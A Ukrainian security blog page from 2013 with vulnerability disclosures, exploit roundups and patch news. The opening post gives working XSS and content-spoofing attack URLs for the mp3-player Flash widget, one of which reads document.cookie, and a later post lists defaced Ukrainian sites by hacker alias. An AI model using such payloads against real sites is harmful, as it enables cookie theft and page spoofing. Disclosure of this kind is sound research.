23:53 11.10.2013
12.08.2013
У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в mp3-player. Про що вже повідомив розробникам веб додатку.
Детальна інформація про уразливості з’явиться пізніше.
11.10.2013
XSS (через Flash Injection) (WASC-08):
http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf
В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.
Content Spoofing (Flash Injection) (WASC-12):
http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf
Content Spoofing (Content Injection) (WASC-12):
http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3
Content Spoofing (HTML Injection) (WASC-12):
http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E
XSS (WASC-08):
http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E
В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.
XSS (Strictly social XSS) (WASC-08):
http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Уразливі mp3-player 2.5 та попередні версії.
Опубліковано в Уразливості | Без Коментарів »
22:45 11.10.2013
Продовжуючи розпочату традицію, після попереднього відео про виконання коду в Adobe Flash Player, пропоную нове відео на веб секюріті тематику. Цього разу відео про виконання коду в Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.
Internet Explorer Exploit (v.6-11) - SetMouseCapture Use-After-Free [CVE-2013-3893]
В даному відео ролику демонструється віддалене виконання коду в Internet Explorer версій 6-11. Використовується експлоіт для проведення атаки на уразливість в Internet Explorer (показано на прикладі IE9) при відкритті сторінки з кодом експлоіту. Що дозволяє нападнику отримати контроль над атакованим комп’ютером. Це свіжа дірка в Internet Explorer, саме відео записане 02.10.2013.
Атака відбувається при відвідуванні в IE спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.
Опубліковано в Статті | Без Коментарів »
20:11 11.10.2013
Виявлені численні уразливості безпеки в Apple Safari.
Уразливі версії: Safari 5.1.
Пошкодження пам’яті.
- APPLE-SA-2013-09-12-2 Safari 5.1.10 (деталі)
Опубліковано в Новини, Помилки | Без Коментарів »
17:20 11.10.2013
В даній добірці експлоіти в веб додатках:
- TOSHIBA e-Studio 232/233/282/283 Change Admin Password CSRF (деталі)
- Good for Enterprise 2.2.2.1611 - XSS Vulnerability (деталі)
- Linksys WRT110 Remote Command Execution Vulnerability (деталі)
- CA BrightStor ARCserve Tape Engine 0×8A Buffer Overflow Vulnerability (деталі)
- PCMAN FTP Server Post-Authentication STOR Command Buffer Overflow (деталі)
Опубліковано в Експлоіти | Без Коментарів »
23:51 10.10.2013
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Mukioplayer, Design-Approval-System та Simple Dropbox. Для котрих з’явилися експлоіти. Mukioplayer - це медіа плеєр, Design-Approval-System - це плагін для розгляду дизайнів, Simple Dropbox - це плагін для інтеграції з Dropbox.
- WordPress Mukioplayer 1.6 SQL Injection (деталі)
- WordPress Design-Approval-System 3.6 Cross Site Scripting (деталі)
- WordPress Simple Dropbox 1.8.8 Shell Upload (деталі)
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Опубліковано в Новини сайту, Уразливості | Без Коментарів »
22:45 10.10.2013
Виявлений слабкий PRNG-генератор в Perl Crypt::DSA.
Уразливі продукти: Crypt::DSA 1.17 модуль для Perl.
За певних умов використовується слабкий генератор.
- Vulnerability in perl-Crypt-DSA (деталі)
Опубліковано в Новини, Помилки | Без Коментарів »
20:01 10.10.2013
Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.
- http://www.dec.gov.ua (хакером HighTech) - 04.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
- http://book.rekord.gov.ua (хакером SultanHaikal) - 06.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
- http://kievlyanenews.com.ua (хакером dr.m1st3r)
- http://веселка.com.ua (хакером dr.m1st3r)
- http://blog.arhstudio-f.com (хакером dr.m1st3r)
Опубліковано в Новини сайту, Дослідження | Без Коментарів »
17:22 10.10.2013
В даній добірці уразливості в веб додатках:
- Polycom - Command Shell Grants System-Level Access (деталі)
- vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities (деталі)
- Polycom - Firmware Update Command Injection (деталі)
- SilverStripe(R) Information Exposure Through Query Strings in GET Request (CWE-598) (деталі)
- Polycom - H.323 CDR Database SQL Injection (деталі)
- Joomla core <= 3.1.5 reflected XSS vulnerability (деталі)
- Polycom - H.323 Format String Vulnerability (деталі)
- Vulnerabilities in owncloud (деталі)
- HP XP P9000 Command View Advanced Edition Suite Products, Remote Disclosure of Information (деталі)
- Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities (деталі)
Опубліковано в Уразливості | Без Коментарів »
22:46 09.10.2013
У жовтні, 01.10.2013, через півтора місяці після виходу Google Chrome 29, вийшов Google Chrome 30.
В браузері зроблено декілька нововведень та виправлені помилки. А також виправлено 19 уразливостей, 10 з яких позначені як небезпечні, а 6 як помірні. Загальна кількість дірок менша, зате кількість небезпечних дірок більша ніж у попередній версії браузера. А з врахуванням уразливостей знайдених під час внутрішнього аудиту, то це рекорд серед усіх релізів.
Уразливості, що мають статус небезпечних, пов’язані зі звертанням до вже звільненої області пам’яті в коді DOM, рендеринга inline-блоків, завантаження ресурсів, розбору XSLT і XML, реалізації PPAPI, діалозі вибору кольору на платформі Windows. Також усунуте пошкодження пам’яті в движку V8 і можливість підміни вмісту адресного рядка. Окремо згадується виправлення ще 27 уразливостей, виявлених у результаті внутрішнього аудиту, 17 з яких позначені як небезпечні.
- Выпуск web-браузера Chrome 30 (деталі)
Опубліковано в Новини, Програми | Без Коментарів »
20:09 09.10.2013
Виявлена можливість обходу перевірки сертифіката в Python.
Уразливі версії: Python 2.7, Python 3.4.
Некоректна обробка NULL-символів.
- Vulnerability in Python (деталі)
Опубліковано в Новини, Помилки | Без Коментарів »